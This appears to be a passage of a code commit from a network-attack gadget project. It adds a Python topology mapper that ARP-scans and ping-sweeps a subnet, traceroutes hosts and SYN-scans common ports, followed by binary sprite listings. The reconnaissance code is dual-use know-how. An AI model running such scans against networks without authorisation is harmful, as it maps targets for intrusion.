DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/topology"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "yggdrasil_mapper_settings.json")


class YggdrasilMapper:
    def __init__(self, network_range, interface=None, max_depth=5, output_dir=DEFAULT_OUTPUT_DIR, timeout=2):
        self.network_range = network_range
        self.interface = interface or scapy.conf.iface
        self.max_depth = max_depth
        self.output_dir = output_dir
        self.timeout = timeout

        self.graph = nx.Graph()
        self.hosts = {}
        self.routes = {}
        self.lock = threading.Lock()

        # For parallel processing
        self.queue = queue.Queue()
        self.results = queue.Queue()

    def discover_hosts(self):
        """Discover live hosts in the network range."""
        try:
            logging.info(f"Discovering hosts in {self.network_range}")

            # ARP scan for the local network
            arp_request = scapy.ARP(pdst=self.network_range)
            broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
            packets = broadcast / arp_request

            answered, _ = scapy.srp(packets, timeout=self.timeout, iface=self.interface, verbose=False)

            for sent, received in answered:
                ip = received.psrc
                mac = received.hwsrc
                self.hosts[ip] = {'mac': mac, 'status': 'up'}
                logging.info(f"Discovered host: {ip} ({mac})")

            # Additional nmap ping sweep for hosts the ARP scan missed
            nm = nmap.PortScanner()
            nm.scan(hosts=self.network_range, arguments='-sn -T4')

            for host in nm.all_hosts():
                if host not in self.hosts:
                    self.hosts[host] = {'status': 'up'}
                    logging.info(f"Discovered host: {host}")

        except Exception as e:
            logging.error(f"Error discovering hosts: {e}")

    def trace_route(self, target):
        """Perform a traceroute to a target (ICMP probes with increasing TTL)."""
        try:
            hops = []
            for ttl in range(1, self.max_depth + 1):
                pkt = IP(dst=target, ttl=ttl) / ICMP()
                reply = scapy.sr1(pkt, timeout=self.timeout, verbose=False)

                if reply is None:
                    continue

                hops.append(reply.src)
                if reply.src == target:
                    break

            return hops
        except Exception as e:
            logging.error(f"Error tracing route to {target}: {e}")
            return []

    def scan_ports(self, ip):
        """Scan common ports on a host (half-open SYN scan)."""
        try:
            common_ports = [21, 22, 23, 25, 53, 80, 443, 445, 3389]
            open_ports = []

            for port in common_ports:
                tcp_connect = IP(dst=ip) / TCP(dport=port, flags="S")
                response = scapy.sr1(tcp_connect, timeout=self.timeout, verbose=False)

                if response and response.haslayer(TCP):
                    if response[TCP].flags == 0x12:  # SYN-ACK: port is open
                        open_ports.append(port)
                        # Send RST to tear down the half-open connection
                        rst = IP(dst=ip) / TCP(dport=port, flags="R")
                        scapy.send(rst, verbose=False)

            return open_ports
        except Exception as e:
            logging.error(f"Error scanning ports for {ip}: {e}")
            return []

    def worker(self):
        """Worker loop for parallel processing (exits on a None sentinel)."""
        while True:
            try:
                task = self.queue.get()
                if task is None:
                    break

                ip = task
                hops = self.trace_route(ip)
                ports = self.scan_ports(ip)

                self.results.put({
                    'ip': ip,
                    'hops': hops,
                    'ports': ports
                })

                self.queue.task_done()
            except Exception as e:
                logging.error(f"Worker error: {e}")
                self.queue.task_done()

    def build_topology(self):
        """Build network topology by tracing routes and scanning hosts."""
        try:
            # Start worker threads
            workers = []
            for _ in range(5):  # number of parallel workers
                t = threading.Thread(target=self.worker)
                t.start()
                workers.append(t)

            # Add tasks to the queue
            for ip in self.hosts.keys():
                self.queue.put(ip)

            # One None sentinel per worker shuts the pool down
            for _ in workers:
                self.queue.put(None)

            # Wait for all workers to complete
            for t in workers:
                t.join()

            # Process results
            while not self.results.empty():
                result = self.results.get()
                ip = result['ip']
                hops = result['hops']
                ports = result['ports']

                self.hosts[ip]['ports'] = ports
                if len(hops) > 1:
                    self.routes[ip] = hops

                # Add nodes and edges to the graph
                self.graph.add_node(ip, **self.hosts[ip])
                for i in range(len(hops) - 1):
                    self.graph.add_edge(hops[i], hops[i + 1])

        except Exception as e:
            logging.error(f"Error building topology: {e}")

    def generate_visualization(self):
        """Generate a network topology visualization."""
        try:
            plt.figure(figsize=(12, 8))

            # Position nodes using a spring layout
            pos = nx.spring_layout(self.graph)

            # Draw nodes
            nx.draw_networkx_nodes(self.graph, pos, node_size=500)

            # Draw edges
            nx.draw_networkx_edges(self.graph, pos)

            # Add labels (intermediate hops may not be in self.hosts, hence .get)
            labels = {}
            for node in self.graph.nodes():
                label = f"{node}\n"
                info = self.hosts.get(node, {})
                if 'ports' in info:
                    label += f"Ports: {', '.join(map(str, info['ports']))}"
                labels[node] = label

            nx.draw_networkx_labels(self.graph, pos, labels, font_size=8)

            # Save the visualization (the output dir may not exist yet)
            os.makedirs(self.output_dir, exist_ok=True)
            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
            viz_path = os.path.join(self.output_dir, f"topology_{timestamp}.png")
            plt.savefig(viz_path)
            plt.close()

            logging.info(f"Visualization saved to {viz_path}")

        except Exception as e:
            logging.error(f"Error generating visualization: {e}")

    def save_results(self):
        """Save topology data to a JSON file."""
        try:
            os.makedirs(self.output_dir, exist_ok=True)
            timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")

            results = {
                'timestamp': datetime.now().isoformat(),
                'network_range': self.network_range,
                'hosts': self.hosts,
                'routes': self.routes,
                'topology': {
                    'nodes': list(self.graph.nodes()),
                    'edges': list(self.graph.edges())
                }
            }

            output_file = os.path.join(self.output_dir, f"topology_{timestamp}.json")
            with open(output_file, 'w') as f:
                json.dump(results, f, indent=4)

            logging.info(f"Results saved to {output_file}")

        except Exception as e:
            logging.error(f"Failed to save results: {e}")

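    # Example of the saved JSON (illustrative, truncated):
    #   {
    #     "timestamp": "2025-01-01T12:00:00",
    #     "network_range": "192.168.1.0/24",
    #     "hosts": {"192.168.1.10": {"mac": "aa:bb:cc:dd:ee:ff", "status": "up", "ports": [22, 80]}},
    #     "routes": {"192.168.1.10": ["192.168.1.1", "192.168.1.10"]},
    #     "topology": {"nodes": ["192.168.1.1", "192.168.1.10"], "edges": [["192.168.1.1", "192.168.1.10"]]}
    #   }
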
    def execute(self):
        """Execute the network mapping process."""
        try:
            logging.info(f"Starting network mapping of {self.network_range}")

            # Discovery phase
            self.discover_hosts()
            if not self.hosts:
                logging.error("No hosts discovered")
                return

            # Topology building phase
            self.build_topology()

            # Generate outputs
            self.generate_visualization()
            self.save_results()

            logging.info("Network mapping completed")

        except Exception as e:
            logging.error(f"Error during execution: {e}")


def save_settings(network_range, interface, max_depth, output_dir, timeout):
    """Save settings to a JSON file."""
    try:
        os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
        settings = {
            "network_range": network_range,
            "interface": interface,
            "max_depth": max_depth,
            "output_dir": output_dir,
            "timeout": timeout
        }
        with open(SETTINGS_FILE, 'w') as f:
            json.dump(settings, f)
        logging.info(f"Settings saved to {SETTINGS_FILE}")
    except Exception as e:
        logging.error(f"Failed to save settings: {e}")


def load_settings():
    """Load settings from the JSON file."""
    if os.path.exists(SETTINGS_FILE):
        try:
            with open(SETTINGS_FILE, 'r') as f:
                return json.load(f)
        except Exception as e:
            logging.error(f"Failed to load settings: {e}")
    return {}

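# Example settings file written by save_settings() (illustrative values):
#   {"network_range": "192.168.1.0/24", "interface": "eth0", "max_depth": 5,
#    "output_dir": "/home/bjorn/Bjorn/data/output/topology", "timeout": 2}
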
def main():
    parser = argparse.ArgumentParser(description="Network topology mapping tool")
    parser.add_argument("-r", "--range", help="Network range to scan (CIDR)")
    parser.add_argument("-i", "--interface", help="Network interface to use")
    parser.add_argument("-d", "--depth", type=int, default=5, help="Maximum trace depth")
    parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
    parser.add_argument("-t", "--timeout", type=int, default=2, help="Timeout for probes")
    args = parser.parse_args()

    settings = load_settings()
    network_range = args.range or settings.get("network_range")
    interface = args.interface or settings.get("interface")
    max_depth = args.depth or settings.get("max_depth")
    output_dir = args.output or settings.get("output_dir")
    timeout = args.timeout or settings.get("timeout")

    if not network_range:
        logging.error("Network range is required. Use -r or save it in settings")
        return

    save_settings(network_range, interface, max_depth, output_dir, timeout)

    mapper = YggdrasilMapper(
        network_range=network_range,
        interface=interface,
        max_depth=max_depth,
        output_dir=output_dir,
        timeout=timeout
    )
    mapper.execute()


if __name__ == "__main__":
    main()
BIN
resources/default_config/characters/ALVA/static/0.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/100.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/25.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/50.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/75.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/AI.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/attack.bmp
Normal file
|
After Width: | Height: | Size: 158 B |
BIN
resources/default_config/characters/ALVA/static/attacks.bmp
Normal file
|
After Width: | Height: | Size: 134 B |
BIN
resources/default_config/characters/ALVA/static/auto.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/bjorn1.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/static/bluetooth.bmp
Normal file
|
After Width: | Height: | Size: 446 B |
BIN
resources/default_config/characters/ALVA/static/charging.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/charging1.bmp
Normal file
|
After Width: | Height: | Size: 438 B |
BIN
resources/default_config/characters/ALVA/static/connected.bmp
Normal file
|
After Width: | Height: | Size: 670 B |
BIN
resources/default_config/characters/ALVA/static/cred.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/data.bmp
Normal file
|
After Width: | Height: | Size: 938 B |
BIN
resources/default_config/characters/ALVA/static/ethernet.bmp
Normal file
|
After Width: | Height: | Size: 670 B |
BIN
resources/default_config/characters/ALVA/static/frise.bmp
Normal file
|
After Width: | Height: | Size: 4.0 KiB |
BIN
resources/default_config/characters/ALVA/static/gold.bmp
Normal file
|
After Width: | Height: | Size: 1.4 KiB |
BIN
resources/default_config/characters/ALVA/static/level.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/manual.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/money.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/networkkb.bmp
Normal file
|
After Width: | Height: | Size: 134 B |
BIN
resources/default_config/characters/ALVA/static/port.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/target.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/usb.bmp
Normal file
|
After Width: | Height: | Size: 670 B |
BIN
resources/default_config/characters/ALVA/static/vuln.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
BIN
resources/default_config/characters/ALVA/static/wifi.bmp
Normal file
|
After Width: | Height: | Size: 950 B |
BIN
resources/default_config/characters/ALVA/static/zombie.bmp
Normal file
|
After Width: | Height: | Size: 1.0 KiB |
|
After Width: | Height: | Size: 29 KiB |
|
Before Width: | Height: | Size: 2.3 KiB After Width: | Height: | Size: 2.3 KiB |
|
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE.bmp
Normal file
|
After Width: | Height: | Size: 174 B |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE1.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE2.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE3.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
BIN
resources/default_config/characters/ALVA/status/IDLE/IDLE4.bmp
Normal file
|
After Width: | Height: | Size: 18 KiB |
|
After Width: | Height: | Size: 2.3 KiB |
|
After Width: | Height: | Size: 18 KiB |
|
After Width: | Height: | Size: 18 KiB |